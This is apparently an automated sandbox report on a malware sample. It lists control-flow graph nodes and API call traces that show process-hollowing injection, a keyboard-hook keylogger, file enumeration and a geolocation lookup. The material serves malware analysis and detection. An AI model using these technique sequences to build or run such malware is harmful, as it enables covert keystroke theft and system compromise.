110430->110432 110431->109675 110596 12344d86 29 API calls 
___std_exception_copy 110432->110596 110434 12344efd 110434->110431 110436 12334846 socket 110435->110436 110437 12334839 110435->110437 110438 12334842 110436->110438 110439 12334860 CreateEventW 110436->110439 110597 1233489e WSAStartup 110437->110597 110438->109675 110439->109675 110441 1233483e 110441->110436 110441->110438 110443 12334f65 110442->110443 110444 12334fea 110442->110444 110445 12334f6e 110443->110445 110446 12334fc0 CreateEventA CreateThread 110443->110446 110447 12334f7d GetLocalTime 110443->110447 110444->109675 110445->110446 110446->110444 110599 12335150 110446->110599 110448 1234bb8e 28 API calls 110447->110448 110449 12334f91 110448->110449 110598 123352fd 28 API calls 110449->110598 110458 12334a1b 110457->110458 110459 123348ee 110457->110459 110460 1233497e 110458->110460 110461 12334a21 WSAGetLastError 110458->110461 110459->110460 110464 1233531e 28 API calls 110459->110464 110484 12334923 110459->110484 110460->109675 110461->110460 110462 12334a31 110461->110462 110465 12334932 110462->110465 110466 12334a36 110462->110466 110468 1233490f 110464->110468 110470 12332093 28 API calls 110465->110470 110608 1234cae1 30 API calls 110466->110608 110467 1233492b 110467->110465 110473 12334941 110467->110473 110471 12332093 28 API calls 110468->110471 110474 12334a80 110470->110474 110475 1233491e 110471->110475 110472 12334a40 110609 123352fd 28 API calls 110472->110609 110481 12334950 110473->110481 110482 12334987 110473->110482 110477 12332093 28 API calls 110474->110477 110478 1234b4ef 79 API calls 110475->110478 110483 12334a8f 110477->110483 110478->110484 110487 12332093 28 API calls 110481->110487 110605 12351a40 53 API calls 110482->110605 110488 1234b4ef 79 API calls 110483->110488 110603 12350c60 27 API calls 110484->110603 110491 1233495f 110487->110491 110488->110460 110490 1233498f 110493 123349c4 110490->110493 110494 12334994 110490->110494 110495 12332093 28 API calls 110491->110495 110607 12350e06 28 API calls 
110493->110607 110497 12332093 28 API calls 110494->110497 110498 1233496e 110495->110498 110500 123349a3 110497->110500 110501 1234b4ef 79 API calls 110498->110501 110503 12332093 28 API calls 110500->110503 110504 12334973 110501->110504 110502 123349cc 110505 123349f9 CreateEventW CreateEventW 110502->110505 110506 12332093 28 API calls 110502->110506 110507 123349b2 110503->110507 110604 1234e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 110504->110604 110505->110460 110508 123349e2 110506->110508 110509 1234b4ef 79 API calls 110507->110509 110511 12332093 28 API calls 110508->110511 110512 123349b7 110509->110512 110513 123349f1 110511->110513 110606 123510b2 51 API calls 110512->110606 110515 1234b4ef 79 API calls 110513->110515 110516 123349f6 110515->110516 110516->110505 110610 1234b7b6 GlobalMemoryStatusEx 110517->110610 110519 1234b7f5 110519->109675 110611 12344580 110520->110611 110524 1233dda5 110523->110524 110525 123434ff 3 API calls 110524->110525 110526 1233ddac 110525->110526 110527 12343549 3 API calls 110526->110527 110528 1233ddc4 110526->110528 110527->110528 110528->109675 110530 123320b7 28 API calls 110529->110530 110531 1234bc57 110530->110531 110531->109675 110532->109675 110534 12366e90 ___scrt_get_show_window_mode 110533->110534 110535 1234bab5 GetForegroundWindow GetWindowTextW 110534->110535 110536 1233417e 28 API calls 110535->110536 110537 1234badf 110536->110537 110537->109675 110539 12332093 28 API calls 110538->110539 110540 1233f8f6 110539->110540 110540->109675 110542 123320df 11 API calls 110541->110542 110543 12332f3d 110542->110543 110544 123332a0 28 API calls 110543->110544 110545 12332f59 110544->110545 110545->109675 110547 12334ab4 110546->110547 110641 1233520c 110547->110641 110549 12334ac9 _Yarn 110550 12334b40 WaitForSingleObject 110549->110550 110551 12334b20 110549->110551 110552 12334b56 110550->110552 110553 12334b32 send 110551->110553 110647 1235103a 53 API calls 110552->110647 110555 
12334b7b 110553->110555 110557 12331fd8 11 API calls 110555->110557 110556 12334b69 SetEvent 110556->110555 110558 12334b83 110557->110558 110559 12331fd8 11 API calls 110558->110559 110560 12334b8b 110559->110560 110560->109675 110562 123320df 11 API calls 110561->110562 110563 12334c27 110562->110563 110564 123320df 11 API calls 110563->110564 110566 12334c30 110564->110566 110565 1236bd51 _Yarn 21 API calls 110565->110566 110566->110565 110568 123320b7 28 API calls 110566->110568 110569 12334ca1 110566->110569 110570 12331fe2 28 API calls 110566->110570 110573 12331fd8 11 API calls 110566->110573 110665 12334b96 110566->110665 110671 12334cc3 110566->110671 110568->110566 110571 12334e26 98 API calls 110569->110571 110570->110566 110572 12334ca8 110571->110572 110574 12331fd8 11 API calls 110572->110574 110573->110566 110575 12334cb1 110574->110575 110576 12331fd8 11 API calls 110575->110576 110577 12334cba 110576->110577 110577->109675 110579->109675 110580->109675 110582->109675 110584 12334e40 SetEvent FindCloseChangeNotification 110583->110584 110585 12334e57 closesocket 110583->110585 110586 12334ed8 110584->110586 110587 12334e64 110585->110587 110586->109675 110588 12334e7a 110587->110588 111080 123350e4 83 API calls 110587->111080 110590 12334ece SetEvent CloseHandle 110588->110590 110591 12334e8c WaitForSingleObject 110588->110591 110590->110586 111081 1234e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 110591->111081 110593 12334e9b SetEvent WaitForSingleObject 111082 1234e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 110593->111082 110595 12334eb3 SetEvent CloseHandle CloseHandle 110595->110590 110596->110434 110597->110441 110602 1233515c 101 API calls 110599->110602 110601 12335159 110602->110601 110603->110467 110604->110460 110605->110490 110606->110504 110607->110502 110608->110472 110610->110519 110614 12344553 110611->110614 110615 12344568 ___scrt_initialize_default_local_stdio_options 110614->110615 
110618 1236f79d 110615->110618 110621 1236c4f0 110618->110621 110622 1236c530 110621->110622 110623 1236c518 110621->110623 110622->110623 110625 1236c538 110622->110625 110636 123705dd 20 API calls __dosmaperr 110623->110636 110637 1236a7b7 35 API calls 2 library calls 110625->110637 110627 1236c548 110638 1236cc76 20 API calls 2 library calls 110627->110638 110628 12364fcb ___crtLCMapStringA 5 API calls 110631 12344576 110628->110631 110630 1236c5c0 110639 1236d2e4 50 API calls 3 library calls 110630->110639 110631->109675 110634 1236c51d __cftof 110634->110628 110635 1236c5cb 110640 1236cce0 20 API calls _free 110635->110640 110636->110634 110637->110627 110638->110630 110639->110635 110640->110634 110642 12335214 110641->110642 110643 123323ce 11 API calls 110642->110643 110644 1233521f 110643->110644 110648 12335234 110644->110648 110646 1233522e 110646->110549 110647->110556 110649 12335240 110648->110649 110650 1233526e 110648->110650 110652 123328e8 28 API calls 110649->110652 110664 123328a4 22 API calls 110650->110664 110654 1233524a 110652->110654 110654->110646 110666 12334ba0 WaitForSingleObject 110665->110666 110667 12334bcd recv 110665->110667 110684 12351076 53 API calls 110666->110684 110669 12334be0 110667->110669 110669->110566 110670 12334bbc SetEvent 110670->110669 110672 123320df 11 API calls 110671->110672 110681 12334cde 110672->110681 110673 12334e13 110674 12331fd8 11 API calls 110673->110674 110675 12334e1c 110674->110675 110675->110566 110676 123341a2 28 API calls 110676->110681 110677 12331fe2 28 API calls 110677->110681 110678 123320f6 28 API calls 110678->110681 110679 12331fc0 28 API calls 110680 12334dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 110679->110680 110680->110681 110998 12345aea 110680->110998 110681->110673 110681->110676 110681->110677 110681->110678 110681->110679 110682 12331fd8 11 API calls 110681->110682 110685 1234299f 110681->110685 110682->110681 110684->110670 110686 123429b1 
110685->110686 110687 123341a2 28 API calls 110686->110687 110688 123429c4 110687->110688 110689 123320f6 28 API calls 110688->110689 110690 123429d3 110689->110690 110691 123320f6 28 API calls 110690->110691 110692 123429e2 110691->110692 110693 1234be1b 28 API calls 110692->110693 110694 123429eb 110693->110694 110695 12342a93 110694->110695 110697 12331e65 22 API calls 110694->110697 110696 12331e8d 11 API calls 110695->110696 110698 12342a9c 110696->110698 110699 12342a02 110697->110699 110700 12331fd8 11 API calls 110698->110700 110701 123320f6 28 API calls 110699->110701 110702 12342aa5 110700->110702 110703 12342a0d 110701->110703 110704 12331fd8 11 API calls 110702->110704 110705 12331e65 22 API calls 110703->110705 110706 12342aad 110704->110706 110707 12342a18 110705->110707 110706->110681 110708 123320f6 28 API calls 110707->110708 110709 12342a23 110708->110709 110710 12331e65 22 API calls 110709->110710 110711 12342a2e 110710->110711 110712 123320f6 28 API calls 110711->110712 110713 12342a39 110712->110713 110714 12331e65 22 API calls 110713->110714 110715 12342a44 110714->110715 110716 123320f6 28 API calls 110715->110716 110717 12342a4f 110716->110717 110718 12331e65 22 API calls 110717->110718 110719 12342a5a 110718->110719 110720 123320f6 28 API calls 110719->110720 110721 12342a65 110720->110721 110722 12331e65 22 API calls 110721->110722 110723 12342a73 110722->110723 110724 123320f6 28 API calls 110723->110724 110725 12342a7e 110724->110725 110729 12342ab4 GetModuleFileNameW 110725->110729 110728 12334e26 98 API calls 110728->110695 110730 123320df 11 API calls 110729->110730 110731 12342adf 110730->110731 110732 123320df 11 API calls 110731->110732 110733 12342aeb 110732->110733 110734 123320df 11 API calls 110733->110734 110757 12342af7 110734->110757 110735 1233d9e8 32 API calls 110735->110757 110736 12331fd8 11 API calls 110736->110757 110737 1234b978 42 API calls 110737->110757 110738 12348568 31 API calls 110738->110757 110739 12342c1d 
Sleep 110739->110757 110740 1233417e 28 API calls 110740->110757 110741 123342fc 78 API calls 110741->110757 110742 1233431d 28 API calls 110742->110757 110743 12333014 28 API calls 110743->110757 110744 12331f09 11 API calls 110744->110757 110745 12342cbf Sleep 110745->110757 110746 12342d61 Sleep 110746->110757 110747 12342dc4 DeleteFileW 110747->110757 110748 12342dfb DeleteFileW 110748->110757 110749 1234c485 32 API calls 110749->110757 110750 12342e4d Sleep 110750->110757 110751 12342e37 DeleteFileW 110751->110757 110752 12342ec6 110753 12331f09 11 API calls 110752->110753 110754 12342ed2 110753->110754 110755 12331f09 11 API calls 110754->110755 110756 12342ede 110755->110756 110758 12331f09 11 API calls 110756->110758 110757->110735 110757->110736 110757->110737 110757->110738 110757->110739 110757->110740 110757->110741 110757->110742 110757->110743 110757->110744 110757->110745 110757->110746 110757->110747 110757->110748 110757->110749 110757->110750 110757->110751 110757->110752 110760 12342e92 Sleep 110757->110760 110759 12342eea 110758->110759 110761 1233b904 28 API calls 110759->110761 110762 12331f09 11 API calls 110760->110762 110763 12342efd 110761->110763 110766 12342ea2 110762->110766 110765 123320f6 28 API calls 110763->110765 110764 12331f09 11 API calls 110764->110766 110767 12342f1d 110765->110767 110766->110757 110766->110764 110769 12342ec4 110766->110769 110876 1234322d 110767->110876 110769->110759 110771 12331f09 11 API calls 110772 12342f34 110771->110772 110773 12342f54 110772->110773 110774 123430a8 110772->110774 110775 1234bd1e 28 API calls 110773->110775 110888 1234bd1e 110774->110888 110778 12342f60 110775->110778 110779 1234bb8e 28 API calls 110778->110779 110782 12342f7a 110779->110782 110780 12332f31 28 API calls 110781 123430e8 110780->110781 110784 12332f10 28 API calls 110781->110784 110783 12332f31 28 API calls 110782->110783 110786 12342faa 110783->110786 110785 123430f7 110784->110785 110788 12332f10 28 API calls 
110785->110788 110787 12332f10 28 API calls 110786->110787 110790 12342fb9 110787->110790 110789 12343103 110788->110789 110792 12332f10 28 API calls 110789->110792 110791 12332f10 28 API calls 110790->110791 110793 12342fc8 110791->110793 110794 12343112 110792->110794 110795 12332f10 28 API calls 110793->110795 110796 12332f10 28 API calls 110794->110796 110798 12342fd7 110795->110798 110797 12343121 110796->110797 110800 12332f10 28 API calls 110797->110800 110799 12332f10 28 API calls 110798->110799 110802 12342fe6 110799->110802 110801 12343130 110800->110801 110804 12332f10 28 API calls 110801->110804 110803 12332f10 28 API calls 110802->110803 110806 12342ff2 110803->110806 110805 1234313f 110804->110805 110892 12332ea1 110805->110892 110807 12332f10 28 API calls 110806->110807 110810 12342ffe 110807->110810 110811 12332ea1 28 API calls 110810->110811 110814 1234300d 110811->110814 110812 12334aa1 60 API calls 110813 12343156 110812->110813 110816 12331fd8 11 API calls 110813->110816 110815 12332f10 28 API calls 110814->110815 110818 12343019 110815->110818 110817 12343162 110816->110817 110820 12331fd8 11 API calls 110817->110820 110819 12332ea1 28 API calls 110818->110819 110822 12343023 110819->110822 110821 1234316e 110820->110821 110824 12331fd8 11 API calls 110821->110824 110823 12334aa1 60 API calls 110822->110823 110825 12343030 110823->110825 110826 1234317a 110824->110826 110827 12331fd8 11 API calls 110825->110827 110828 12331fd8 11 API calls 110826->110828 110830 12343039 110827->110830 110829 12343186 110828->110829 110832 12331fd8 11 API calls 110829->110832 110831 12331fd8 11 API calls 110830->110831 110834 12343042 110831->110834 110833 1234318f 110832->110833 110836 12331fd8 11 API calls 110833->110836 110835 12331fd8 11 API calls 110834->110835 110838 1234304b 110835->110838 110837 12343198 110836->110837 110840 12331fd8 11 API calls 110837->110840 110839 12331fd8 11 API calls 110838->110839 110842 12343054 110839->110842 110841 1234309c 
110840->110841 110844 12331fd8 11 API calls 110841->110844 110843 12331fd8 11 API calls 110842->110843 110845 12343060 110843->110845 110847 123431aa 110844->110847 110846 12331fd8 11 API calls 110845->110846 110849 1234306c 110846->110849 110848 12331f09 11 API calls 110847->110848 110851 123431b6 110848->110851 110850 12331fd8 11 API calls 110849->110850 110853 12343078 110850->110853 110852 12331fd8 11 API calls 110851->110852 110855 123431c2 110852->110855 110854 12331fd8 11 API calls 110853->110854 110856 12343084 110854->110856 110857 12331fd8 11 API calls 110855->110857 110858 12331fd8 11 API calls 110856->110858 110859 123431ce 110857->110859 110861 12343090 110858->110861 110860 12331fd8 11 API calls 110859->110860 110863 123431da 110860->110863 110862 12331fd8 11 API calls 110861->110862 110862->110841 110864 12331fd8 11 API calls 110863->110864 110865 123431e6 110864->110865 110866 12331fd8 11 API calls 110865->110866 110867 123431f2 110866->110867 110868 12331fd8 11 API calls 110867->110868 110869 123431fe 110868->110869 110870 12331fd8 11 API calls 110869->110870 110871 1234320a 110870->110871 110872 12331fd8 11 API calls 110871->110872 110873 12343216 110872->110873 110874 12331fd8 11 API calls 110873->110874 110875 12342a83 110874->110875 110875->110728 110878 1234323c 110876->110878 110886 1234326b 110876->110886 110877 1234327a 110879 1233417e 28 API calls 110877->110879 110905 12341cf2 110878->110905 110880 12343286 110879->110880 110882 12331fd8 11 API calls 110880->110882 110884 12342f28 110882->110884 110884->110771 110886->110877 110901 14641c5b 110886->110901 110889 1234bd2b 110888->110889 110890 123320b7 28 API calls 110889->110890 110891 123430b1 110890->110891 110891->110780 110898 12332eb0 110892->110898 110893 12332ef2 110894 12331fb0 28 API calls 110893->110894 110895 12332ef0 110894->110895 110896 12332055 11 API calls 110895->110896 110897 12332f09 110896->110897 110897->110812 110898->110893 110899 12332ee7 110898->110899 110997 

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 12348136
• GetProcAddress.KERNEL32(00000000), ref: 12348139
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 1234814A
• GetProcAddress.KERNEL32(00000000), ref: 1234814D
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 1234815E
• GetProcAddress.KERNEL32(00000000), ref: 12348161
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 12348172
• GetProcAddress.KERNEL32(00000000), ref: 12348175
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 12348217
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 1234822F
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 12348245
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 1234826B
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 12348293
• NtUnmapViewOfSection.NTDLL(?,?), ref: 123482BB
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 123482DB
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 123482ED
• NtClose.NTDLL(?), ref: 123482F7
• TerminateProcess.KERNEL32(?,00000000), ref: 12348301
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 12348341
• NtMapViewOfSection.NTDLL(?,00000000), ref: 1234834C
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 1234840B
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 12348428
• ResumeThread.KERNEL32(?), ref: 12348435
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1234844C
• GetCurrentProcess.KERNEL32(?), ref: 12348457
• NtUnmapViewOfSection.NTDLL(00000000), ref: 1234845E
• NtClose.NTDLL(?), ref: 12348468
• TerminateProcess.KERNEL32(?,00000000), ref: 12348472
• GetLastError.KERNEL32 ref: 1234847A
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 3150337530-3035715614
• Opcode ID: 70c691841189a6a8711d2b041b03e6602f3ac1123b14f4695d51fe82881c409f
• Instruction ID: f70df4c0ddae1e46c75ab55c3f3d572c43315ec123e4e05a6a9bcd125f116e4f
• Opcode Fuzzy Hash: 70c691841189a6a8711d2b041b03e6602f3ac1123b14f4695d51fe82881c409f
• Instruction Fuzzy Hash: 3BA191B1644355AFDB108F64CC84BAB7BECFF88708F504A2AF659D6251DB70E804CB66
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1233A2D3
• SetWindowsHookExA.USER32(0000000D,1233A2A4,00000000), ref: 1233A2E1
• GetLastError.KERNEL32 ref: 1233A2ED
  • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
• KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 1233A33B
• TranslateMessage.USER32(?), ref: 1233A34A
• DispatchMessageA.USER32(?), ref: 1233A355
Strings
• Keylogger initialization failure: error , xrefs: 1233A301
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Message$CallbackDispatchDispatcherErrorHandleHookLastLocalModuleTimeTranslateUserWindows
• String ID: Keylogger initialization failure: error
• API String ID: 941179788-952744263
• Opcode ID: 42673667ab289fe8aa34a6067c4671e754e0c1b8a6d355f5e7485b631b17e109
• Instruction ID: 62324c7a248caf9075aa8c7b37455a4e255da717ca52e4ac910d228308b2c082
• Opcode Fuzzy Hash: 42673667ab289fe8aa34a6067c4671e754e0c1b8a6d355f5e7485b631b17e109
• Instruction Fuzzy Hash: AA11E373A50245ABD7126B75CC489AB77ECEBD5322B104B2DF88AC2280FA30D601C762
Uniqueness
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not preserved)
APIs
• GetForegroundWindow.USER32(?,?,123A50F0), ref: 1233A416
• GetWindowThreadProcessId.USER32(00000000,?), ref: 1233A422
• GetKeyboardLayout.USER32(00000000), ref: 1233A429
• GetKeyState.USER32(00000010), ref: 1233A433
• GetKeyboardState.USER32(?,?,123A50F0), ref: 1233A43E
• ToUnicodeEx.USER32(123A5144,0000005B,?,?,00000010,00000000,00000000), ref: 1233A461
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 1233A4C1
• ToUnicodeEx.USER32(123A5144,?,?,?,00000010,00000000,00000000), ref: 1233A4FA
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID:
• API String ID: 1888522110-0
• Opcode ID: e39b44ca35054e5905fddd8133582bae432bdc59d814fe86838e2ec28f0f463e
• Instruction ID: f620f10849ecb6435459c2079fa96b82b69b943257eb30a6b0c20f3f2f4bbf13
• Opcode Fuzzy Hash: e39b44ca35054e5905fddd8133582bae432bdc59d814fe86838e2ec28f0f463e
• Instruction Fuzzy Hash: B3315E72544318BFD711DA90CC84F9BBBECEB88754F00092AF645D7190E6B1E649DB92
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not preserved; basic blocks: 146410f1-14641166, 14641168-14641172, 14641177-1464119e (FindFirstFileW), 146411a0-146411a8, 146411aa-146411c4, 146411c7-146411d8 (FindNextFileW), 146411da-146411db (FindClose), 146411e1-146411e9)
APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 14641137
• lstrcatW.KERNEL32(?,?), ref: 14641151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 14641193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 146411D0
• FindClose.KERNEL32(00000000), ref: 146411DB
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 0f3915156e5c8da750f0eaf9ca25acb0406a55f12c5bd48b326bc925b09973f3
• Instruction ID: d3ced3889d8f80a0f9a3a965f7a69438c01abbd9726e60c4c6b87bee7a8295bc
• Opcode Fuzzy Hash: 0f3915156e5c8da750f0eaf9ca25acb0406a55f12c5bd48b326bc925b09973f3
• Instruction Fuzzy Hash: B421E371A04318ABDB21EF64AC4CFCB7B9CEF84758F18092AF958D3091EB30D2058796
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not preserved)
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 1234B3A7
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 1234B3BD
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 1234B3D6
• InternetCloseHandle.WININET(00000000), ref: 1234B41C
• InternetCloseHandle.WININET(00000000), ref: 1234B41F
Strings
• http://geoplugin.net/json.gp, xrefs: 1234B3B7
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 8c05bd6b167cd80b4ebe6e3e6228a6f3f144c8843285de6183d63f9772c423d8
• Instruction ID: b44bd17cb11bafc46bea005ffd889cdf6e33e6bdf8b85d93f32575da06804dea
• Opcode Fuzzy Hash: 8c05bd6b167cd80b4ebe6e3e6228a6f3f144c8843285de6183d63f9772c423d8
• Instruction Fuzzy Hash: FE1198766063616BD228DE258C88DBB7FEDEFC5661F50092DF80597240DB64E908C7B1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 1234179C: SetLastError.KERNEL32(0000000D,12341D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,12341CFA), ref: 123417A2
• SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,12341CFA), ref: 12341D37
• GetNativeSystemInfo.KERNEL32(?,1233D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,12341CFA), ref: 12341DA5
• SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 12341DC9
  • Part of subcall function 12341CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,12341DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 12341CB3
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 12341E10
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 12341E17
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 12341F2A
  • Part of subcall function 12342077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,12341F37,?,?,?,?,?), ref: 123420E7
  • Part of subcall function 12342077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 123420EE
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
• String ID:
• API String ID: 3950776272-0
• Opcode ID: 17f0e4f1c5c5c3fa42b1069a8ae9a11d7757fc58f86660e3743e21b635c0a396
• Instruction ID: 106777d9e337e1c865ded9e1d6eb295415e0017d579186a50d979255288ea5de
• Opcode Fuzzy Hash: 17f0e4f1c5c5c3fa42b1069a8ae9a11d7757fc58f86660e3743e21b635c0a396
• Instruction Fuzzy Hash: 9061F6B6700A959BC7509F25CD80B7A7BE9BF84740F604399E9898B241DFB4E841CBD1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 12343549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 12343569
  • Part of subcall function 12343549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,123A52F0), ref: 12343587
  • Part of subcall function 12343549: RegCloseKey.KERNEL32(?), ref: 12343592
• Sleep.KERNEL32(00000BB8), ref: 1233F85B
• ExitProcess.KERNEL32 ref: 1233F8CA
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 4.9.4 Pro$override$pth_unenc
• API String ID: 2281282204-930821335
• Opcode ID: 662fb9d4a4a93c331a5637c007a0784a2ce548d1b1fe295fcfbb1eca9f816946
• Instruction ID: 61101cb2eb241014a1956f981e69624d1ad096479c9a39bd779258e0678048ee
• Opcode Fuzzy Hash: 662fb9d4a4a93c331a5637c007a0784a2ce548d1b1fe295fcfbb1eca9f816946
• Instruction Fuzzy Hash: BD214D7BF5034057D9AE77754C55ABE3AA95BC2711FA00218F0468B2C5EE24AF0583E3
Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 005912C5
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 005912D5
• LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 0059141C
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: AllocVirtual$LibraryLoad
• String ID:
• API String ID: 2441068224-0
• Opcode ID: fa4691a24655f1888525f96d2d85cbe1021a4a7afa0b3384a6494944f45a67a8
• Instruction ID: 6cc02f01f01422443cc0a465ff73a5553caaa436fc15274bb6ef38e1e28243a1
• Opcode Fuzzy Hash: fa4691a24655f1888525f96d2d85cbe1021a4a7afa0b3384a6494944f45a67a8
